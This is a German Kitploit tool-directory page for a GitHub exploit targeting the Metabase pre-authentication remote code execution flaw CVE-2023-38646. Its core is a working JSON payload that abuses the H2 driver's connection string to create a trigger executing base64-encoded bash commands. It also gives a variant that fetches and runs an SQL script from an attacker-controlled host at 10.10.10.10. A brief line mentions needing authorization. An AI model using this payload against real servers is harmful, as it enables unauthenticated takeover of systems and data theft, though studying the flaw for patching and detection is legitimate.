Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Another-Metabase-RCE-CVE-2023-38646 — Metabase postgres (org.h2.Driver) RCE ohne INIT | Kitploit
Tools/GitHubGitHub/0utl4nder/another-metabase-rce-cve-2023-38646
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHub0utl4nder/another-metabase-rce-cve-2023-38646

Another-Metabase-RCE-CVE-2023-38646

Metabase postgres (org.h2.Driver) RCE ohne INIT

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
1vor 2 JahrenNoch nicht geprüft

Erweiterung der Pre-Auth RCE in Metabase (CVE-2023-38646), erklärt hier

Dies half mir, Fehler im Zusammenhang mit "database already in use" zu vermeiden (mit H2 und Postgre als Engines)

root@kitploit:~
{
"token": "TOKEN",
"details":
{
 "is_on_demand": false,
 "is_full_sync": false,
 "is_sample": false,
 "cache_ttl": null,
 "refingerprint": false,
 "auto_run_queries": true,
 "schedules":{},
 "details":
 {
  "advanced-options":true,
  "classname":"org.h2.Driver",
  "subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
  "subprotocol": "h2"
 },
 "engine": "postgres",
 "name": "x"
}}

Anstatt h2 direkt als Engine mit dem INIT-Skript zu verwenden, da es aus unseren Abfragen entfernt wurde, verwenden wir weiterhin die Datenbankabfrage für die h2-Engine

INIT-Skript mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'

In der .sql-Datei geben Sie die Methode zur Ausführung von Shell-Befehlen an

REFERENZ

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase

Als Notiz geschrieben, betrachten Sie es als vage Dokumentation. Sie müssen eine Autorisierung haben, um Ziele zu enumerieren, auszunutzen oder einfach zu testen

Kommentare und Beiträge sind willkommen

Tool herunterladen